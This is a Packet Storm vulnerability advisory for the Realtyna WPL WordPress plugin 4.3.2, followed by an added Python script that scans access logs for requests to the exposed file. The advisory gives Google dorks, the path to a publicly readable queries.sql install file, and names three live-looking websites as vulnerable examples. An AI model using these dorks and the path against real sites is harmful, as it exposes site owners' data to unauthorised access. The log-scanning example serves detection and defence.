WordPress Real-Estate-Listing-Realtyna-Wpl 4.3.2 Database Disclosure

2018-12-10T00:00:00
ID PACKETSTORM:150697
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-10T00:00:00

Description

`#################################################################################################
  
# Exploit Title : WordPress Real-Estate-Listing-Realtyna-Wpl Plugins 4.3.2 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : realtyna.com ~ wordpress.org/plugins/real-estate-listing-realtyna-wpl/
# Software Download Links :
downloads.wordpress.org/plugin/real-estate-listing-realtyna-wpl.4.3.2.zip
+ realtyna.com/real-estate-theme-wpl-pro-package/
+ github.com/wp-plugins/real-estate-listing-realtyna-wpl/archive/master.zip
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : 2.8.0 and 4.3.2  
# Exploit Risk : Medium  
# Google Dorks :  
inurl:''/wp-content/plugins/real-estate-listing-realtyna-wpl/''  
intext:''A(c) 2017 Swadesi. All Rights Reserved.''  
# Vulnerability Type :
CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ]
CWE-200 - [ Information Exposure ]
CWE-530 - [ Exposure of Backup File to an Unauthorized Control Sphere ]
  
#################################################################################################  
  
+ Realtyna Organic IDX plugin + WPL Real Estate 4.3.2 Database Backup Disclosure
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
healthproperty.ca/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
[+]  
swadesi.com/news/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
[+]  
pytcherhomes.com/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install/queries.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`
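
For site owners running this plugin, the following added example (not part of the original advisory) scans web-server access logs for requests to the path listed under "# Exploit" and reports whether the server actually returned the file. It assumes Combined Log Format; the log lines are constructed samples and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Path published in the advisory; sites installed in a subdirectory
# (e.g. /news/) carry a prefix, so matching is done on the suffix.
EXPOSED_SUFFIX = ("/wp-content/plugins/real-estate-listing-realtyna-wpl"
                  "/assets/install/queries.sql")

# Combined Log Format (assumption about the server's log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')

def normalise(target):
    """Drop the query string, percent-decode, collapse '//', lower-case."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r"/{2,}", "/", path).lower()

def find_disclosures(lines):
    """Return one record per request that touched the exposed file."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not normalise(m["target"]).endswith(EXPOSED_SUFFIX):
            continue
        status = int(m["status"])
        size = 0 if m["size"] == "-" else int(m["size"])
        reachable = status in (200, 206)          # server did not block it
        hits.append({"ip": m["ip"], "time": m["ts"], "status": status,
                     "reachable": reachable,
                     "downloaded": reachable and m["method"] == "GET" and size > 0})
    return hits

# Constructed sample log lines (documentation IP ranges).
P = "/wp-content/plugins/real-estate-listing-realtyna-wpl/assets/install"
SAMPLE_LOG = [
    f'203.0.113.7 - - [10/Dec/2018:09:14:02 +0000] "GET {P}/queries.sql HTTP/1.1" 200 48211 "-" "curl/7.61.0"',
    f'198.51.100.23 - - [10/Dec/2018:09:15:40 +0000] "GET /news{P}/queries%2Esql?x=1 HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Dec/2018:09:16:01 +0000] "GET /wp-login.php HTTP/1.1" 200 2764 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - [10/Dec/2018:09:17:12 +0000] "HEAD {P.upper()}/queries.sql HTTP/1.1" 200 - "-" "-"',
]

if __name__ == "__main__":
    for hit in find_disclosures(SAMPLE_LOG):
        print(hit)
```

Any record with `reachable` set means the web server is still serving the file; a 403 or 404 on every hit indicates the path is blocked or the file has been removed.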